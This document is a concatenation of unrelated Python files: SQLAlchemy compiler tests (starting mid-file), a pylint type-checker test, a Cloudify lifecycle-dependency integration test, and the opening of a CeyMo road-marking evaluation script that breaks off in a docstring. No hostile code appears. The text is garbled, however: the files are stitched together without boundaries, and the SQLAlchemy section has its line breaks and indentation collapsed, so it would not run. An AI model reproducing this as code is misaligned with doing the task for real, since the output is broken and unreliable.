table1.select().where(table1.c.name == "hi"), "SELECT bar.mytable.myid, bar.mytable.name, " "bar.mytable.description FROM bar.mytable " "WHERE bar.mytable.name = :name_1", schema_translate_map=schema_translate_map, ) self.assert_compile( table4.select().where(table4.c.value == "hi"), "SELECT foob.remotetable.rem_id, foob.remotetable.datatype_id, " "foob.remotetable.value FROM foob.remotetable " "WHERE foob.remotetable.value = :value_1", schema_translate_map=schema_translate_map, ) schema_translate_map = {"remote_owner": 
"foob"} self.assert_compile( select([table1, table4]).select_from( join(table1, table4, table1.c.myid == table4.c.rem_id) ), "SELECT mytable.myid, mytable.name, mytable.description, " "foob.remotetable.rem_id, foob.remotetable.datatype_id, " "foob.remotetable.value FROM mytable JOIN foob.remotetable " "ON mytable.myid = foob.remotetable.rem_id", schema_translate_map=schema_translate_map, ) def test_schema_translate_aliases(self): schema_translate_map = {None: "bar"} m = MetaData() table1 = Table( "mytable", m, Column("myid", Integer), Column("name", String), Column("description", String), ) table2 = Table( "myothertable", m, Column("otherid", Integer), Column("othername", String), ) alias = table1.alias() stmt = ( select([table2, alias]) .select_from(table2.join(alias, table2.c.otherid == alias.c.myid)) .where(alias.c.name == "foo") ) self.assert_compile( stmt, "SELECT bar.myothertable.otherid, bar.myothertable.othername, " "mytable_1.myid, mytable_1.name, mytable_1.description " "FROM bar.myothertable JOIN bar.mytable AS mytable_1 " "ON bar.myothertable.otherid = mytable_1.myid " "WHERE mytable_1.name = :name_1", schema_translate_map=schema_translate_map, ) def test_schema_translate_crud(self): schema_translate_map = {"remote_owner": "foob", None: "bar"} m = MetaData() table1 = Table( "mytable", m, Column("myid", Integer), Column("name", String), Column("description", String), ) self.assert_compile( table1.insert().values(description="foo"), "INSERT INTO bar.mytable (description) VALUES (:description)", schema_translate_map=schema_translate_map, ) self.assert_compile( table1.update() .where(table1.c.name == "hi") .values(description="foo"), "UPDATE bar.mytable SET description=:description " "WHERE bar.mytable.name = :name_1", schema_translate_map=schema_translate_map, ) self.assert_compile( table1.delete().where(table1.c.name == "hi"), "DELETE FROM bar.mytable WHERE bar.mytable.name = :name_1", schema_translate_map=schema_translate_map, ) self.assert_compile( 
table4.insert().values(value="there"), "INSERT INTO foob.remotetable (value) VALUES (:value)", schema_translate_map=schema_translate_map, ) self.assert_compile( table4.update() .where(table4.c.value == "hi") .values(value="there"), "UPDATE foob.remotetable SET value=:value " "WHERE foob.remotetable.value = :value_1", schema_translate_map=schema_translate_map, ) self.assert_compile( table4.delete().where(table4.c.value == "hi"), "DELETE FROM foob.remotetable WHERE " "foob.remotetable.value = :value_1", schema_translate_map=schema_translate_map, ) def test_alias(self): a = alias(table4, "remtable") self.assert_compile( a.select(a.c.datatype_id == 7), "SELECT remtable.rem_id, remtable.datatype_id, " "remtable.value FROM" " remote_owner.remotetable AS remtable " "WHERE remtable.datatype_id = :datatype_id_1", ) def test_update(self): self.assert_compile( table4.update( table4.c.value == "test", values={table4.c.datatype_id: 12} ), "UPDATE remote_owner.remotetable SET datatype_id=:datatype_id " "WHERE remote_owner.remotetable.value = :value_1", ) def test_insert(self): self.assert_compile( table4.insert(values=(2, 5, "test")), "INSERT INTO remote_owner.remotetable " "(rem_id, datatype_id, value) VALUES " "(:rem_id, :datatype_id, :value)", ) class CorrelateTest(fixtures.TestBase, AssertsCompiledSQL): __dialect__ = "default" def test_dont_overcorrelate(self): self.assert_compile( select([table1], from_obj=[table1, table1.select()]), "SELECT mytable.myid, mytable.name, " "mytable.description FROM mytable, (SELECT " "mytable.myid AS myid, mytable.name AS " "name, mytable.description AS description " "FROM mytable)", ) def _fixture(self): t1 = table("t1", column("a")) t2 = table("t2", column("a")) return t1, t2, select([t1]).where(t1.c.a == t2.c.a) def _assert_where_correlated(self, stmt): self.assert_compile( stmt, "SELECT t2.a FROM t2 WHERE t2.a = " "(SELECT t1.a FROM t1 WHERE t1.a = t2.a)", ) def _assert_where_all_correlated(self, stmt): self.assert_compile( stmt, "SELECT 
t1.a, t2.a FROM t1, t2 WHERE t2.a = " "(SELECT t1.a WHERE t1.a = t2.a)", ) # note there's no more "backwards" correlation after # we've done #2746 # def _assert_where_backwards_correlated(self, stmt): # self.assert_compile( # stmt, # "SELECT t2.a FROM t2 WHERE t2.a = " # "(SELECT t1.a FROM t2 WHERE t1.a = t2.a)") # def _assert_column_backwards_correlated(self, stmt): # self.assert_compile(stmt, # "SELECT t2.a, (SELECT t1.a FROM t2 WHERE t1.a = t2.a) " # "AS anon_1 FROM t2") def _assert_column_correlated(self, stmt): self.assert_compile( stmt, "SELECT t2.a, (SELECT t1.a FROM t1 WHERE t1.a = t2.a) " "AS anon_1 FROM t2", ) def _assert_column_all_correlated(self, stmt): self.assert_compile( stmt, "SELECT t1.a, t2.a, " "(SELECT t1.a WHERE t1.a = t2.a) AS anon_1 FROM t1, t2", ) def _assert_having_correlated(self, stmt): self.assert_compile( stmt, "SELECT t2.a FROM t2 HAVING t2.a = " "(SELECT t1.a FROM t1 WHERE t1.a = t2.a)", ) def _assert_from_uncorrelated(self, stmt): self.assert_compile( stmt, "SELECT t2.a, anon_1.a FROM t2, " "(SELECT t1.a AS a FROM t1, t2 WHERE t1.a = t2.a) AS anon_1", ) def _assert_from_all_uncorrelated(self, stmt): self.assert_compile( stmt, "SELECT t1.a, t2.a, anon_1.a FROM t1, t2, " "(SELECT t1.a AS a FROM t1, t2 WHERE t1.a = t2.a) AS anon_1", ) def _assert_where_uncorrelated(self, stmt): self.assert_compile( stmt, "SELECT t2.a FROM t2 WHERE t2.a = " "(SELECT t1.a FROM t1, t2 WHERE t1.a = t2.a)", ) def _assert_column_uncorrelated(self, stmt): self.assert_compile( stmt, "SELECT t2.a, (SELECT t1.a FROM t1, t2 " "WHERE t1.a = t2.a) AS anon_1 FROM t2", ) def _assert_having_uncorrelated(self, stmt): self.assert_compile( stmt, "SELECT t2.a FROM t2 HAVING t2.a = " "(SELECT t1.a FROM t1, t2 WHERE t1.a = t2.a)", ) def _assert_where_single_full_correlated(self, stmt): self.assert_compile( stmt, "SELECT t1.a FROM t1 WHERE t1.a = (SELECT t1.a)" ) def test_correlate_semiauto_where(self): t1, t2, s1 = self._fixture() self._assert_where_correlated( 
select([t2]).where(t2.c.a == s1.correlate(t2)) ) def test_correlate_semiauto_column(self): t1, t2, s1 = self._fixture() self._assert_column_correlated( select([t2, s1.correlate(t2).as_scalar()]) ) def test_correlate_semiauto_from(self): t1, t2, s1 = self._fixture() self._assert_from_uncorrelated(select([t2, s1.correlate(t2).alias()])) def test_correlate_semiauto_having(self): t1, t2, s1 = self._fixture() self._assert_having_correlated( select([t2]).having(t2.c.a == s1.correlate(t2)) ) def test_correlate_except_inclusion_where(self): t1, t2, s1 = self._fixture() self._assert_where_correlated( select([t2]).where(t2.c.a == s1.correlate_except(t1)) ) def test_correlate_except_exclusion_where(self): t1, t2, s1 = self._fixture() self._assert_where_uncorrelated( select([t2]).where(t2.c.a == s1.correlate_except(t2)) ) def test_correlate_except_inclusion_column(self): t1, t2, s1 = self._fixture() self._assert_column_correlated( select([t2, s1.correlate_except(t1).as_scalar()]) ) def test_correlate_except_exclusion_column(self): t1, t2, s1 = self._fixture() self._assert_column_uncorrelated( select([t2, s1.correlate_except(t2).as_scalar()]) ) def test_correlate_except_inclusion_from(self): t1, t2, s1 = self._fixture() self._assert_from_uncorrelated( select([t2, s1.correlate_except(t1).alias()]) ) def test_correlate_except_exclusion_from(self): t1, t2, s1 = self._fixture() self._assert_from_uncorrelated( select([t2, s1.correlate_except(t2).alias()]) ) def test_correlate_except_none(self): t1, t2, s1 = self._fixture() self._assert_where_all_correlated( select([t1, t2]).where(t2.c.a == s1.correlate_except(None)) ) def test_correlate_except_having(self): t1, t2, s1 = self._fixture() self._assert_having_correlated( select([t2]).having(t2.c.a == s1.correlate_except(t1)) ) def test_correlate_auto_where(self): t1, t2, s1 = self._fixture() self._assert_where_correlated(select([t2]).where(t2.c.a == s1)) def test_correlate_auto_column(self): t1, t2, s1 = self._fixture() 
self._assert_column_correlated(select([t2, s1.as_scalar()])) def test_correlate_auto_from(self): t1, t2, s1 = self._fixture() self._assert_from_uncorrelated(select([t2, s1.alias()])) def test_correlate_auto_having(self): t1, t2, s1 = self._fixture() self._assert_having_correlated(select([t2]).having(t2.c.a == s1)) def test_correlate_disabled_where(self): t1, t2, s1 = self._fixture() self._assert_where_uncorrelated( select([t2]).where(t2.c.a == s1.correlate(None)) ) def test_correlate_disabled_column(self): t1, t2, s1 = self._fixture() self._assert_column_uncorrelated( select([t2, s1.correlate(None).as_scalar()]) ) def test_correlate_disabled_from(self): t1, t2, s1 = self._fixture() self._assert_from_uncorrelated( select([t2, s1.correlate(None).alias()]) ) def test_correlate_disabled_having(self): t1, t2, s1 = self._fixture() self._assert_having_uncorrelated( select([t2]).having(t2.c.a == s1.correlate(None)) ) def test_correlate_all_where(self): t1, t2, s1 = self._fixture() self._assert_where_all_correlated( select([t1, t2]).where(t2.c.a == s1.correlate(t1, t2)) ) def test_correlate_all_column(self): t1, t2, s1 = self._fixture() self._assert_column_all_correlated( select([t1, t2, s1.correlate(t1, t2).as_scalar()]) ) def test_correlate_all_from(self): t1, t2, s1 = self._fixture() self._assert_from_all_uncorrelated( select([t1, t2, s1.correlate(t1, t2).alias()]) ) def test_correlate_where_all_unintentional(self): t1, t2, s1 = self._fixture() assert_raises_message( exc.InvalidRequestError, "returned no FROM clauses due to auto-correlation", select([t1, t2]).where(t2.c.a == s1).compile, ) def test_correlate_from_all_ok(self): t1, t2, s1 = self._fixture() self.assert_compile( select([t1, t2, s1]), "SELECT t1.a, t2.a, a FROM t1, t2, " "(SELECT t1.a AS a FROM t1, t2 WHERE t1.a = t2.a)", ) def test_correlate_auto_where_singlefrom(self): t1, t2, s1 = self._fixture() s = select([t1.c.a]) s2 = select([t1]).where(t1.c.a == s) self.assert_compile( s2, "SELECT t1.a FROM t1 WHERE 
t1.a = " "(SELECT t1.a FROM t1)" ) def test_correlate_semiauto_where_singlefrom(self): t1, t2, s1 = self._fixture() s = select([t1.c.a]) s2 = select([t1]).where(t1.c.a == s.correlate(t1)) self._assert_where_single_full_correlated(s2) def test_correlate_except_semiauto_where_singlefrom(self): t1, t2, s1 = self._fixture() s = select([t1.c.a]) s2 = select([t1]).where(t1.c.a == s.correlate_except(t2)) self._assert_where_single_full_correlated(s2) def test_correlate_alone_noeffect(self): # new as of #2668 t1, t2, s1 = self._fixture() self.assert_compile( s1.correlate(t1, t2), "SELECT t1.a FROM t1, t2 WHERE t1.a = t2.a" ) def test_correlate_except_froms(self): # new as of #2748 t1 = table("t1", column("a")) t2 = table("t2", column("a"), column("b")) s = select([t2.c.b]).where(t1.c.a == t2.c.a) s = s.correlate_except(t2).alias("s") s2 = select([func.foo(s.c.b)]).as_scalar() s3 = select([t1], order_by=s2) self.assert_compile( s3, "SELECT t1.a FROM t1 ORDER BY " "(SELECT foo(s.b) AS foo_1 FROM " "(SELECT t2.b AS b FROM t2 WHERE t1.a = t2.a) AS s)", ) def test_multilevel_froms_correlation(self): # new as of #2748 p = table("parent", column("id")) c = table("child", column("id"), column("parent_id"), column("pos")) s = ( c.select() .where(c.c.parent_id == p.c.id) .order_by(c.c.pos) .limit(1) ) s = s.correlate(p) s = exists().select_from(s).where(s.c.id == 1) s = select([p]).where(s) self.assert_compile( s, "SELECT parent.id FROM parent WHERE EXISTS (SELECT * " "FROM (SELECT child.id AS id, child.parent_id AS parent_id, " "child.pos AS pos FROM child WHERE child.parent_id = parent.id " "ORDER BY child.pos LIMIT :param_1) WHERE id = :id_1)", ) def test_no_contextless_correlate_except(self): # new as of #2748 t1 = table("t1", column("x")) t2 = table("t2", column("y")) t3 = table("t3", column("z")) s = ( select([t1]) .where(t1.c.x == t2.c.y) .where(t2.c.y == t3.c.z) .correlate_except(t1) ) self.assert_compile( s, "SELECT t1.x FROM t1, t2, t3 WHERE t1.x = t2.y AND t2.y = t3.z" ) 
def test_multilevel_implicit_correlation_disabled(self): # test that implicit correlation with multilevel WHERE correlation # behaves like 0.8.1, 0.7 (i.e. doesn't happen) t1 = table("t1", column("x")) t2 = table("t2", column("y")) t3 = table("t3", column("z")) s = select([t1.c.x]).where(t1.c.x == t2.c.y) s2 = select([t3.c.z]).where(t3.c.z == s.as_scalar()) s3 = select([t1]).where(t1.c.x == s2.as_scalar()) self.assert_compile( s3, "SELECT t1.x FROM t1 " "WHERE t1.x = (SELECT t3.z " "FROM t3 " "WHERE t3.z = (SELECT t1.x " "FROM t1, t2 " "WHERE t1.x = t2.y))", ) def test_from_implicit_correlation_disabled(self): # test that implicit correlation with immediate and # multilevel FROM clauses behaves like 0.8.1 (i.e. doesn't happen) t1 = table("t1", column("x")) t2 = table("t2", column("y")) s = select([t1.c.x]).where(t1.c.x == t2.c.y) s2 = select([t2, s]) s3 = select([t1, s2]) self.assert_compile( s3, "SELECT t1.x, y, x FROM t1, " "(SELECT t2.y AS y, x FROM t2, " "(SELECT t1.x AS x FROM t1, t2 WHERE t1.x = t2.y))", ) class CoercionTest(fixtures.TestBase, AssertsCompiledSQL): __dialect__ = default.DefaultDialect(supports_native_boolean=True) def _fixture(self): m = MetaData() return Table("foo", m, Column("id", Integer)) bool_table = table("t", column("x", Boolean)) def test_coerce_bool_where(self): self.assert_compile( select([self.bool_table]).where(self.bool_table.c.x), "SELECT t.x FROM t WHERE t.x", ) def test_coerce_bool_where_non_native(self): self.assert_compile( select([self.bool_table]).where(self.bool_table.c.x), "SELECT t.x FROM t WHERE t.x = 1", dialect=default.DefaultDialect(supports_native_boolean=False), ) self.assert_compile( select([self.bool_table]).where(~self.bool_table.c.x), "SELECT t.x FROM t WHERE t.x = 0", dialect=default.DefaultDialect(supports_native_boolean=False), ) def test_null_constant(self): self.assert_compile(_literal_as_text(None), "NULL") def test_false_constant(self): self.assert_compile(_literal_as_text(False), "false") def 
test_true_constant(self): self.assert_compile(_literal_as_text(True), "true") def test_val_and_false(self): t = self._fixture() self.assert_compile(and_(t.c.id == 1, False), "false") def test_val_and_true_coerced(self): t = self._fixture() self.assert_compile(and_(t.c.id == 1, True), "foo.id = :id_1") def test_val_is_null_coerced(self): t = self._fixture() self.assert_compile(and_(t.c.id == None), "foo.id IS NULL") # noqa def test_val_and_None(self): t = self._fixture() self.assert_compile(and_(t.c.id == 1, None), "foo.id = :id_1 AND NULL") def test_None_and_val(self): t = self._fixture() self.assert_compile(and_(None, t.c.id == 1), "NULL AND foo.id = :id_1") def test_None_and_nothing(self): # current convention is None in and_() # returns None May want # to revise this at some point. self.assert_compile(and_(None), "NULL") def test_val_and_null(self): t = self._fixture() self.assert_compile( and_(t.c.id == 1, null()), "foo.id = :id_1 AND NULL" ) class ResultMapTest(fixtures.TestBase): """test the behavior of the 'entry stack' and the determination when the result_map needs to be populated. 
""" def test_compound_populates(self): t = Table("t", MetaData(), Column("a", Integer), Column("b", Integer)) stmt = select([t]).union(select([t])) comp = stmt.compile() eq_( comp._create_result_map(), { "a": ("a", (t.c.a, "a", "a"), t.c.a.type), "b": ("b", (t.c.b, "b", "b"), t.c.b.type), }, ) def test_compound_not_toplevel_doesnt_populate(self): t = Table("t", MetaData(), Column("a", Integer), Column("b", Integer)) subq = select([t]).union(select([t])) stmt = select([t.c.a]).select_from(t.join(subq, t.c.a == subq.c.a)) comp = stmt.compile() eq_( comp._create_result_map(), {"a": ("a", (t.c.a, "a", "a"), t.c.a.type)}, ) def test_compound_only_top_populates(self): t = Table("t", MetaData(), Column("a", Integer), Column("b", Integer)) stmt = select([t.c.a]).union(select([t.c.b])) comp = stmt.compile() eq_( comp._create_result_map(), {"a": ("a", (t.c.a, "a", "a"), t.c.a.type)}, ) def test_label_plus_element(self): t = Table("t", MetaData(), Column("a", Integer)) l1 = t.c.a.label("bar") tc = type_coerce(t.c.a, String) stmt = select([t.c.a, l1, tc]) comp = stmt.compile() tc_anon_label = comp._create_result_map()["anon_1"][1][0] eq_( comp._create_result_map(), { "a": ("a", (t.c.a, "a", "a"), t.c.a.type), "bar": ("bar", (l1, "bar"), l1.type), "anon_1": ( "%%(%d anon)s" % id(tc), (tc_anon_label, "anon_1", tc), tc.type, ), }, ) def test_label_conflict_union(self): t1 = Table( "t1", MetaData(), Column("a", Integer), Column("b", Integer) ) t2 = Table("t2", MetaData(), Column("t1_a", Integer)) union = select([t2]).union(select([t2])).alias() t1_alias = t1.alias() stmt = ( select([t1, t1_alias]) .select_from(t1.join(union, t1.c.a == union.c.t1_a)) .apply_labels() ) comp = stmt.compile() eq_( set(comp._create_result_map()), set(["t1_1_b", "t1_1_a", "t1_a", "t1_b"]), ) is_(comp._create_result_map()["t1_a"][1][2], t1.c.a) def test_insert_with_select_values(self): astring = Column("a", String) aint = Column("a", Integer) m = MetaData() Table("t1", m, astring) t2 = Table("t2", m, 
aint) stmt = t2.insert().values(a=select([astring])).returning(aint) comp = stmt.compile(dialect=postgresql.dialect()) eq_( comp._create_result_map(), {"a": ("a", (aint, "a", "a"), aint.type)}, ) def test_insert_from_select(self): astring = Column("a", String) aint = Column("a", Integer) m = MetaData() Table("t1", m, astring) t2 = Table("t2", m, aint) stmt = ( t2.insert().from_select(["a"], select([astring])).returning(aint) ) comp = stmt.compile(dialect=postgresql.dialect()) eq_( comp._create_result_map(), {"a": ("a", (aint, "a", "a"), aint.type)}, ) def test_nested_api(self): from sqlalchemy.engine.result import ResultMetaData stmt2 = select([table2]) stmt1 = select([table1]).select_from(stmt2) contexts = {} int_ = Integer() class MyCompiler(compiler.SQLCompiler): def visit_select(self, stmt, *arg, **kw): if stmt is stmt2: with self._nested_result() as nested: contexts[stmt2] = nested text = super(MyCompiler, self).visit_select(stmt2) self._add_to_result_map("k1", "k1", (1, 2, 3), int_) else: text = super(MyCompiler, self).visit_select( stmt, *arg, **kw ) self._add_to_result_map("k2", "k2", (3, 4, 5), int_) return text comp = MyCompiler(default.DefaultDialect(), stmt1) eq_( ResultMetaData._create_result_map(contexts[stmt2][0]), { "otherid": ( "otherid", (table2.c.otherid, "otherid", "otherid"), table2.c.otherid.type, ), "othername": ( "othername", (table2.c.othername, "othername", "othername"), table2.c.othername.type, ), "k1": ("k1", (1, 2, 3), int_), }, ) eq_( comp._create_result_map(), { "myid": ( "myid", (table1.c.myid, "myid", "myid"), table1.c.myid.type, ), "k2": ("k2", (3, 4, 5), int_), "name": ( "name", (table1.c.name, "name", "name"), table1.c.name.type, ), "description": ( "description", (table1.c.description, "description", "description"), table1.c.description.type, ), }, ) def test_select_wraps_for_translate_ambiguity(self): # test for issue #3657 t = table("a", column("x"), column("y"), column("z")) l1, l2, l3 = t.c.z.label("a"), t.c.x.label("b"), 
t.c.x.label("c") orig = [t.c.x, t.c.y, l1, l2, l3] stmt = select(orig) wrapped = stmt._generate() wrapped = wrapped.column( func.ROW_NUMBER().over(order_by=t.c.z) ).alias() wrapped_again = select([c for c in wrapped.c]) compiled = wrapped_again.compile( compile_kwargs={"select_wraps_for": stmt} ) proxied = [obj[0] for (k, n, obj, type_) in compiled._result_columns] for orig_obj, proxied_obj in zip(orig, proxied): is_(orig_obj, proxied_obj) def test_select_wraps_for_translate_ambiguity_dupe_cols(self): # test for issue #3657 t = table("a", column("x"), column("y"), column("z")) l1, l2, l3 = t.c.z.label("a"), t.c.x.label("b"), t.c.x.label("c") orig = [t.c.x, t.c.y, l1, l2, l3] # create the statement with some duplicate columns. right now # the behavior is that these redundant columns are deduped. stmt = select([t.c.x, t.c.y, l1, t.c.y, l2, t.c.x, l3]) # so the statement has 7 inner columns... eq_(len(list(stmt.inner_columns)), 7) # but only exposes 5 of them, the other two are dupes of x and y eq_(len(stmt.c), 5) # and when it generates a SELECT it will also render only 5 eq_(len(stmt._columns_plus_names), 5) wrapped = stmt._generate() wrapped = wrapped.column( func.ROW_NUMBER().over(order_by=t.c.z) ).alias() # so when we wrap here we're going to have only 5 columns wrapped_again = select([c for c in wrapped.c]) # so the compiler logic that matches up the "wrapper" to the # "select_wraps_for" can't use inner_columns to match because # these collections are not the same compiled = wrapped_again.compile( compile_kwargs={"select_wraps_for": stmt} ) proxied = [obj[0] for (k, n, obj, type_) in compiled._result_columns] for orig_obj, proxied_obj in zip(orig, proxied): is_(orig_obj, proxied_obj)
# Copyright (c) 2003-2016 LOGILAB S.A. (Paris, FRANCE).
# http://www.logilab.fr/ -- mailto:<EMAIL>
# Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html
# For details: https://github.com/PyCQA/pylint/blob/master/COPYING

"""Unittest for the type checker."""

import unittest

from astroid import test_utils
from pylint.checkers import typecheck
from pylint.testutils import CheckerTestCase, Message, set_config


class TypeCheckerTest(CheckerTestCase):
    "Tests for pylint.checkers.typecheck"

    CHECKER_CLASS = typecheck.TypeChecker

    def test_no_member_in_getattr(self):
        """Make sure that a module attribute access is checked by pylint.
        """
        node = test_utils.extract_node("""
        import optparse
        optparse.THIS_does_not_EXIST
        """)
        expected = Message(
            'no-member',
            node=node,
            args=('Module', 'optparse', 'THIS_does_not_EXIST'))
        with self.assertAddsMessages(expected):
            self.checker.visit_attribute(node)

    @set_config(ignored_modules=('argparse',))
    def test_no_member_in_getattr_ignored(self):
        """Make sure that a module attribute access check is omitted with a
        module that is configured to be ignored.
        """
        node = test_utils.extract_node("""
        import argparse
        argparse.THIS_does_not_EXIST
        """)
        with self.assertNoMessages():
            self.checker.visit_attribute(node)

    @set_config(ignored_classes=('xml.etree.', ))
    def test_ignored_modules_invalid_pattern(self):
        # A trailing dot is not a valid recursive pattern, so the
        # attribute access is still reported.
        node = test_utils.extract_node('''
        import xml
        xml.etree.Lala
        ''')
        message = Message('no-member', node=node,
                          args=('Module', 'xml.etree', 'Lala'))
        with self.assertAddsMessages(message):
            self.checker.visit_attribute(node)

    @set_config(ignored_modules=('xml.etree*', ))
    def test_ignored_modules_patterns(self):
        # A glob pattern in ignored-modules suppresses the message.
        node = test_utils.extract_node('''
        import xml
        xml.etree.portocola #@
        ''')
        with self.assertNoMessages():
            self.checker.visit_attribute(node)

    @set_config(ignored_classes=('xml.*', ))
    def test_ignored_classes_no_recursive_pattern(self):
        # 'xml.*' does not match sub-sub-modules, so the message is
        # still emitted for xml.etree.ElementTree.
        node = test_utils.extract_node('''
        import xml
        xml.etree.ElementTree.Test
        ''')
        message = Message('no-member', node=node,
                          args=('Module', 'xml.etree.ElementTree', 'Test'))
        with self.assertAddsMessages(message):
            self.checker.visit_attribute(node)

    @set_config(ignored_classes=('optparse.Values', ))
    def test_ignored_classes_qualified_name(self):
        """Test that ignored-classes supports qualified name for ignoring."""
        node = test_utils.extract_node('''
        import optparse
        optparse.Values.lala
        ''')
        with self.assertNoMessages():
            self.checker.visit_attribute(node)

    @set_config(ignored_classes=('Values', ))
    def test_ignored_classes_only_name(self):
        """Test that ignored_classes works with the name only."""
        node = test_utils.extract_node('''
        import optparse
        optparse.Values.lala
        ''')
        with self.assertNoMessages():
            self.checker.visit_attribute(node)

    @set_config(contextmanager_decorators=('contextlib.contextmanager',
                                           '.custom_contextmanager'))
    def test_custom_context_manager(self):
        """Test that @custom_contextmanager is recognized as configured."""
        node = test_utils.extract_node('''
        from contextlib import contextmanager
        def custom_contextmanager(f):
            return contextmanager(f)
        @custom_contextmanager
        def dec():
            yield
        with dec():
            pass
        ''')
        with self.assertNoMessages():
            self.checker.visit_with(node)


if __name__ == '__main__':
    unittest.main()
########
# Copyright (c) 2019 Cloudify Platform Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#        http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import uuid

import pytest

from integration_tests import AgentlessTestCase
from integration_tests.tests import utils

pytestmark = pytest.mark.group_workflows


@pytest.mark.usefixtures('mock_workflows_plugin')
class DependsOnLifecycleOperationTest(AgentlessTestCase):
    """Tests for the depends_on_lifecycle_operation relationship."""

    @staticmethod
    def generate_blueprint(depended_on_operation):
        # Blueprint template: ``depends_on_operation_node`` depends on the
        # given lifecycle operation of ``node``.  Every lifecycle operation
        # is mapped to a no-op mock workflow.
        return """
tosca_definitions_version: cloudify_dsl_1_3
imports:
  - cloudify/types/types.yaml
  - wf--blueprint:mock_workflows
node_templates:
  node:
    type: cloudify.nodes.Root
    interfaces:
      cloudify.interfaces.lifecycle:
        precreate: wf--mock_workflows.mock_workflows.workflows.do_nothing
        configure: wf--mock_workflows.mock_workflows.workflows.do_nothing
        create: wf--mock_workflows.mock_workflows.workflows.do_nothing
        start: wf--mock_workflows.mock_workflows.workflows.do_nothing
  depends_on_operation_node:
    type: cloudify.nodes.Root
    relationships:
      - type: cloudify.relationships.depends_on_lifecycle_operation
        target: node
        properties:
          operation: {0}
    interfaces:
      cloudify.interfaces.lifecycle:
        precreate: wf--mock_workflows.mock_workflows.workflows.do_nothing
        configure: wf--mock_workflows.mock_workflows.workflows.do_nothing
        create: wf--mock_workflows.mock_workflows.workflows.do_nothing
        start: wf--mock_workflows.mock_workflows.workflows.do_nothing
""".format(depended_on_operation)

    def _test_full_flow(self, expected_info, tested_operation):
        # Deploy a blueprint whose dependent node waits for
        # ``tested_operation`` and assert the dependencies of its
        # configure-subgraph carry the expected info strings.
        self.assertIsInstance(expected_info, list)
        base_blueprint_path = utils.get_resource('dsl/mock_workflows.yaml')
        self.client.blueprints.upload(base_blueprint_path, 'mock_workflows')
        utils.wait_for_blueprint_upload('mock_workflows', self.client)
        deployment_id = 'd{0}'.format(uuid.uuid4())
        main_blueprint = self.generate_blueprint(tested_operation)
        main_blueprint_path = self.make_yaml_file(main_blueprint)
        _, execution_id = self.deploy_application(main_blueprint_path,
                                                  deployment_id=deployment_id)
        task_graphs = self.client.tasks_graphs.list(execution_id, 'install')
        operations_info = {}
        operations_id = {}
        for graph in task_graphs:
            operations = self.client.operations.list(graph.id)
            for op in operations:
                operations_id[op.id] = {}
                operations_id[op.id]['dependencies'] = op.dependencies
                operations_id[op.id]['info'] = op.info
                try:
                    cloudify_context = op.parameters['task_kwargs'][
                        'kwargs']['__cloudify_context']
                except KeyError:
                    continue
                op_name = cloudify_context['operation']['name']
                node_name = cloudify_context['node_name']
                operations_info[(op_name, node_name)] = op.containing_subgraph

        # Does not matter from what operation the node's main subgraph id
        # will be taken from.
        install_depends_id = operations_info[
            ('cloudify.interfaces.lifecycle.configure',
             'depends_on_operation_node')]
        next_tasks_info = [operations_id[dep]['info']
                           for dep in
                           operations_id[install_depends_id]['dependencies']]
        self.assertCountEqual(expected_info, next_tasks_info)

    def test_depends_on_precreate_operation(self):
        self._test_full_flow(['Node instance precreated'], 'precreate')

    def test_depends_on_configure_operation(self):
        self._test_full_flow(['Node instance configured', 'configured'],
                             'configure')

    def test_depends_on_create_operation(self):
        self._test_full_flow(['Node instance created', 'created'], 'create')

    def test_scaled_relationships(self):
        # Same flow as above, but with the two nodes scaled to two
        # instances each; every dependent instance must wait on the
        # depended-on operation.
        deployment_id = 'd{0}'.format(uuid.uuid4())
        main_blueprint = self.generate_blueprint('create') + """
groups:
  group1:
    members: [node, depends_on_operation_node]
policies:
  policy:
    type: cloudify.policies.scaling
    targets: [group1]
    properties:
      default_instances: 2
"""
        base_blueprint_path = utils.get_resource('dsl/mock_workflows.yaml')
        self.client.blueprints.upload(base_blueprint_path, 'mock_workflows')
        utils.wait_for_blueprint_upload('mock_workflows', self.client)
        main_blueprint_path = self.make_yaml_file(main_blueprint)
        _, execution_id = self.deploy_application(main_blueprint_path,
                                                  deployment_id=deployment_id)
        task_graphs = self.client.tasks_graphs.list(execution_id, 'install')
        operations_info = {}
        operations_id = {}
        for graph in task_graphs:
            operations = self.client.operations.list(graph.id)
            for op in operations:
                operations_id[op.id] = {}
                operations_id[op.id]['dependencies'] = op.dependencies
                operations_id[op.id]['info'] = op.info
                try:
                    cloudify_context = op.parameters['task_kwargs'][
                        'kwargs']['__cloudify_context']
                except KeyError:
                    continue
                op_name = cloudify_context['operation']['name']
                node_id = cloudify_context['node_id']
                operations_info[(op_name, node_id)] = {}
                operations_info[(op_name, node_id)]['containing_subgraph']\
                    = op.containing_subgraph
                operations_info[(op_name, node_id)]['op_name'] = op_name

        install_subgraph_ids = [v['containing_subgraph']
                                for (__, node), v in operations_info.items()
                                if ('depends_on_operation_node' in node and
                                    v['op_name'] ==
                                    'cloudify.interfaces.lifecycle.configure')]
        self.assertEqual(len(install_subgraph_ids), 2)
        for install_id in install_subgraph_ids:
            next_tasks_info = [operations_id[dep]['info']
                               for dep in
                               operations_id[install_id]['dependencies']]
            self.assertCountEqual(['Node instance created', 'created'],
                                  next_tasks_info)
'''
Evaluation script for the CeyMo Road Marking Dataset

gt_dir should contain the ground truth json files and pred_dir should contain
prediction json files respectively. The file system should follow the
following order.

home_directory/
    |___ gt_dir/
    |       |___001.json
    |       |___002.json
    |       |___ ....
    |___ pred_dir/
            |___001.json
            |___002.json
            |___ ....
'''

from shapely.geometry import Polygon
from tabulate import tabulate
from os import listdir
import json
import argparse

# Per-class and per-scenario counters (copied per use with .copy()).
class_dict = {'SA':0, 'LA':0, 'RA':0, 'SLA':0, 'SRA':0, 'DM':0, 'PC':0,
              'JB':0, 'SL':0, 'BL':0, 'CL':0}
scene_dict = {'normal':0, 'crowded':0, 'dazzle light':0, 'night':0,
              'rain':0, 'shadow':0}


def get_IoU(pol_1, pol_2):
    """Return the intersection-over-union of two polygons.

    Args:
        pol_1, pol_2: sequences of (x, y) points accepted by
            shapely.geometry.Polygon.

    Returns:
